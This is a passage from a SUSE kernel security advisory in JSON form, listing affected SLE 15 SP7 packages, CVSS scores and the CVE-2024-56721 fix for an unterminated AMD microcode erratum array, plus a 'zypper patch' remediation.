"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "low"
}
],
"title": "CVE-2024-53149"
},
{
"cve": "CVE-2024-56721",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-56721"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/CPU/AMD: Terminate the erratum_1386_microcode array\n\nThe erratum_1386_microcode array requires an empty entry at the end.\nOtherwise x86_match_cpu_with_stepping() will continue iterate the array after\nit ended.\n\nAdd an empty entry to erratum_1386_microcode to its end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-56721",
"url": "https://www.suse.com/security/cve/CVE-2024-56721"
},
{
"category": "external",
"summary": "SUSE Bug 1235566 for CVE-2024-56721",
"url": "https://bugzilla.suse.com/1235566"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
